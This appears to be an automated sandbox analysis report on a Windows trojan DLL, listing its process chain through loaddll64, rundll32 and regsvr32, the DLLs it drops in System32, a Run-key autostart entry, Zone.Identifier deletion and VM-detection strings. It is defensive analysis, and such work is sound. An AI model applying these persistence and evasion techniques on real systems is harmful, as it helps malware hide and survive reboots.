Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180027EA4	4_2_0000000180027EA4
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000001800096B8	4_2_00000001800096B8
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000EAC4	4_2_000000018000EAC4
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180018ECC	4_2_0000000180018ECC
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001B2F0	4_2_000000018001B2F0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180007AF0	4_2_0000000180007AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000E708	4_2_000000018000E708
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180010310	4_2_0000000180010310
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180015B18	4_2_0000000180015B18
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000871C	4_2_000000018000871C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180021728	4_2_0000000180021728
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001D32C	4_2_000000018001D32C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001CF30	4_2_000000018001CF30
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180015334	4_2_0000000180015334
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000A734	4_2_000000018000A734
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180027348	4_2_0000000180027348
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180004B4C	4_2_0000000180004B4C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180006B5C	4_2_0000000180006B5C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180001B5C	4_2_0000000180001B5C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180001364	4_2_0000000180001364
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000FF64	4_2_000000018000FF64
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000C364	4_2_000000018000C364
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000E368	4_2_000000018000E368
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001E76C	4_2_000000018001E76C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180018778	4_2_0000000180018778
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180012780	4_2_0000000180012780
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001FB88	4_2_000000018001FB88
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180013B88	4_2_0000000180013B88
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180022B8C	4_2_0000000180022B8C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000CB8D	4_2_000000018000CB8D
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180008FA0	4_2_0000000180008FA0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180014FA4	4_2_0000000180014FA4
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000001800197AC	4_2_00000001800197AC
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000001800257B4	4_2_00000001800257B4
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180013FE0	4_2_0000000180013FE0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000F3E0	4_2_000000018000F3E0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000001F1B4D60000	4_2_000001F1B4D60000
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180020454	5_2_0000000180020454
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180028C94	5_2_0000000180028C94
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800038A5	5_2_00000001800038A5
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800248E0	5_2_00000001800248E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180009144	5_2_0000000180009144
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180005DB4	5_2_0000000180005DB4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180004DDC	5_2_0000000180004DDC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000B1E0	5_2_000000018000B1E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180009E38	5_2_0000000180009E38
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180003BE8	5_2_0000000180003BE8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180009BEC	5_2_0000000180009BEC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800173F8	5_2_00000001800173F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180017BF8	5_2_0000000180017BF8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180015400	5_2_0000000180015400
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180001000	5_2_0000000180001000
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000741C	5_2_000000018000741C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000E828	5_2_000000018000E828
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180002834	5_2_0000000180002834
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180014C48	5_2_0000000180014C48
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018002005C	5_2_000000018002005C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180016464	5_2_0000000180016464
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180005478	5_2_0000000180005478
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180006880	5_2_0000000180006880
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018002748C	5_2_000000018002748C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001308C	5_2_000000018001308C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180024098	5_2_0000000180024098
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001B898	5_2_000000018001B898
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000C498	5_2_000000018000C498
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180004CA0	5_2_0000000180004CA0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800110AC	5_2_00000001800110AC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800148B0	5_2_00000001800148B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800078B6	5_2_00000001800078B6
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180001CCC	5_2_0000000180001CCC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000B8D0	5_2_000000018000B8D0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800198DC	5_2_00000001800198DC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800038DC	5_2_00000001800038DC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800264F8	5_2_00000001800264F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800084F8	5_2_00000001800084F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000BD00	5_2_000000018000BD00
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180015508	5_2_0000000180015508
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180018D0C	5_2_0000000180018D0C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180012110	5_2_0000000180012110
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001B520	5_2_000000018001B520
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180029124	5_2_0000000180029124
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180013524	5_2_0000000180013524
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180009D24	5_2_0000000180009D24
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180023D28	5_2_0000000180023D28
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180002128	5_2_0000000180002128
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180020930	5_2_0000000180020930
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001F550	5_2_000000018001F550
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180020D54	5_2_0000000180020D54
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180010954	5_2_0000000180010954
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180018560	5_2_0000000180018560
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000E570	5_2_000000018000E570
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001C974	5_2_000000018001C974
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000F174	5_2_000000018000F174
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180025D84	5_2_0000000180025D84
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180005590	5_2_0000000180005590
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180017198	5_2_0000000180017198
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800159A0	5_2_00000001800159A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180011DAC	5_2_0000000180011DAC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000D1AC	5_2_000000018000D1AC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800069C0	5_2_00000001800069C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000A1D4	5_2_000000018000A1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800079D8	5_2_00000001800079D8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001C1DC	5_2_000000018001C1DC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000D1E0	5_2_000000018000D1E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800199E8	5_2_00000001800199E8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800099EC	5_2_00000001800099EC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180028A04	5_2_0000000180028A04
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001FA08	5_2_000000018001FA08
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001E614	5_2_000000018001E614
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180001A1C	5_2_0000000180001A1C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000BA24	5_2_000000018000BA24
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180021A2C	5_2_0000000180021A2C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180019230	5_2_0000000180019230
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000BE34	5_2_000000018000BE34
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180012244	5_2_0000000180012244
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180006650	5_2_0000000180006650
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180001660	5_2_0000000180001660
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180011664	5_2_0000000180011664
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001827C	5_2_000000018001827C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180024680	5_2_0000000180024680
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180022A84	5_2_0000000180022A84
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000AE84	5_2_000000018000AE84
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180028690	5_2_0000000180028690
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180015694	5_2_0000000180015694
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180007694	5_2_0000000180007694
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180013698	5_2_0000000180013698
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180009298	5_2_0000000180009298
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018002629C	5_2_000000018002629C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001629C	5_2_000000018001629C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000569C	5_2_000000018000569C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180027EA4	5_2_0000000180027EA4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800096B8	5_2_00000001800096B8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000EAC4	5_2_000000018000EAC4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180018ECC	5_2_0000000180018ECC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001B2F0	5_2_000000018001B2F0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180007AF0	5_2_0000000180007AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000E708	5_2_000000018000E708

Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: En3ZIyuYdw.dll

Virustotal: Detection: 45%

Source: En3ZIyuYdw.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\En3ZIyuYdw.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\En3ZIyuYdw.dll,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RJsEQYV\DCGMIKhx.dll"
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KkpTOJipNydtZ\ukztcGVtQBo.dll"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HVTkRBUydWHs\wOpoKzU.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IASGzYkaksn\BFlBQr.dll"
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\RJsEQYV\DCGMIKhx.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\QYzAfBQRbM\CtOPL.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\En3ZIyuYdw.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\En3ZIyuYdw.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IASGzYkaksn\BFlBQr.dll"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll",#1	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HVTkRBUydWHs\wOpoKzU.dll"	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KkpTOJipNydtZ\ukztcGVtQBo.dll"	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RJsEQYV\DCGMIKhx.dll"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\QYzAfBQRbM\CtOPL.dll"	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Users\user\AppData\Local\QYzAfBQRbM\

Jump to behavior

Source: classification engine

Classification label: mal84.troj.evad.winDLL@21/2@0/49

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFA0AE73CB0 CreateWindowExW,RegisterTouchWindow,MessageBoxW,CoCreateInstance,new,ShowWindow,UpdateWindow,

0_2_00007FFA0AE73CB0

Source: C:\Windows\System32\loaddll64.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_0000000180005DB4 FindCloseChangeNotification,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,

0_2_0000000180005DB4

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll",#1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_01

Source: C:\Windows\System32\regsvr32.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: En3ZIyuYdw.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: En3ZIyuYdw.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: En3ZIyuYdw.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: En3ZIyuYdw.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: En3ZIyuYdw.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: En3ZIyuYdw.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: En3ZIyuYdw.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: En3ZIyuYdw.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: En3ZIyuYdw.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: En3ZIyuYdw.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: En3ZIyuYdw.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: En3ZIyuYdw.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: En3ZIyuYdw.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: En3ZIyuYdw.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE6837D push rdi; ret	0_2_00007FFA0AE68384
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE68909 push rdi; ret	0_2_00007FFA0AE68912
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001E0D3 push 09B8E1F7h; retf	0_2_000000018001E0DD
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001E0E9 push 8B48E1F7h; retf	0_2_000000018001E0F1
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180023127 push ebp; ret	0_2_0000000180023128
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001E5C5 pushad ; ret	0_2_000000018001E5C7
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180022E55 push ebp; retf	0_2_0000000180022E56
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180023A7E push ebp; ret	0_2_0000000180023A86
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180022F5E push ebp; ret	0_2_0000000180022F64
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000838C push eax; ret	0_2_000000018000838E
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA0AE6837D push rdi; ret	3_2_00007FFA0AE68384
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA0AE68909 push rdi; ret	3_2_00007FFA0AE68912
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001E0D3 push 09B8E1F7h; retf	3_2_000000018001E0DD
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001E0E9 push 8B48E1F7h; retf	3_2_000000018001E0F1
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180023127 push ebp; ret	3_2_0000000180023128
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001E5C5 pushad ; ret	3_2_000000018001E5C7
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180022E55 push ebp; retf	3_2_0000000180022E56
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180023A7E push ebp; ret	3_2_0000000180023A86
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180022F5E push ebp; ret	3_2_0000000180022F64
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000838C push eax; ret	3_2_000000018000838E
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001E0D3 push 09B8E1F7h; retf	4_2_000000018001E0DD
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001E0E9 push 8B48E1F7h; retf	4_2_000000018001E0F1
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180023127 push ebp; ret	4_2_0000000180023128
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001E5C5 pushad ; ret	4_2_000000018001E5C7
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180022E55 push ebp; retf	4_2_0000000180022E56
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180023A7E push ebp; ret	4_2_0000000180023A86
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180022F5E push ebp; ret	4_2_0000000180022F64
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000838C push eax; ret	4_2_000000018000838E
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001E0D3 push 09B8E1F7h; retf	5_2_000000018001E0DD
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001E0E9 push 8B48E1F7h; retf	5_2_000000018001E0F1
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180023127 push ebp; ret	5_2_0000000180023128

Source: En3ZIyuYdw.dll	Static PE information: section name: .gxfg
Source: En3ZIyuYdw.dll	Static PE information: section name: .gehcont

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\En3ZIyuYdw.dll

Source: C:\Windows\System32\rundll32.exe

PE file moved: C:\Windows\System32\RJsEQYV\DCGMIKhx.dll

Jump to behavior

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\regsvr32.exe

Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DCGMIKhx.dll

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DCGMIKhx.dll			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DCGMIKhx.dll			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\loaddll64.exe	File opened: C:\Windows\system32\IASGzYkaksn\BFlBQr.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Windows\system32\HVTkRBUydWHs\wOpoKzU.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\system32\KkpTOJipNydtZ\ukztcGVtQBo.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\system32\RJsEQYV\DCGMIKhx.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\QYzAfBQRbM\CtOPL.dll:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe TID: 2940

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll64.exe	API coverage: 9.2 %
Source: C:\Windows\System32\regsvr32.exe	API coverage: 9.0 %

Source: C:\Windows\System32\loaddll64.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE6C334 FindFirstFileExW,		0_2_00007FFA0AE6C334
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA0AE6C334 FindFirstFileExW,		3_2_00007FFA0AE6C334

Source: C:\Windows\System32\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: rundll32.exe, 00000004.00000002.313981400.000001F1B3359000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}R
Source: regsvr32.exe, 00000006.00000003.429303159.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.697330680.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: regsvr32.exe, 00000006.00000003.551591031.0000000000E14000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552305868.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429595707.0000000000E14000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.697674835.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\loaddll64.exe

